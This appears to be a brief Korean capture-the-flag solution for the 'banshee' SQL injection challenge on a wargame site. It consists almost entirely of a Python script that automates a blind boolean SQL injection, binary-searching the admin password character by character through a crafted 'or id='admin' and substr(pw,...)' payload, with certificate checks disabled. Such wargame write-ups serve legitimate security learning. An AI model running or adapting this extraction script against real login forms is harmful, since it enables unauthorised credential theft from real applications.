쉬운 문제

풀이

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable flag warning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import math

headers = {'Cookie': 'PHPSESSID=##'}

password = ""
while True:
    _min=0x20
    _max=0x80

    # binary search
    while _min != _max:
        query = f"'or id='admin' and substr(pw,{len(password)+1},1)>char({math.ceil((_min+_max)/2)-1})"
        url = f"<https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?pw={query}> -- g"

        res = requests.get(url=url, headers= headers, verify=False)
        print("narrow!", _min, _max)
        if res.text.find("<br><h2>login success!</h2>") != -1: # true
            _min = math.ceil((_min+_max)/2)
        else:
            _max = math.ceil((_min+_max)/2) - 1

    # answer!
    password += chr(_min)
    print("find!", password)

print(password.lower())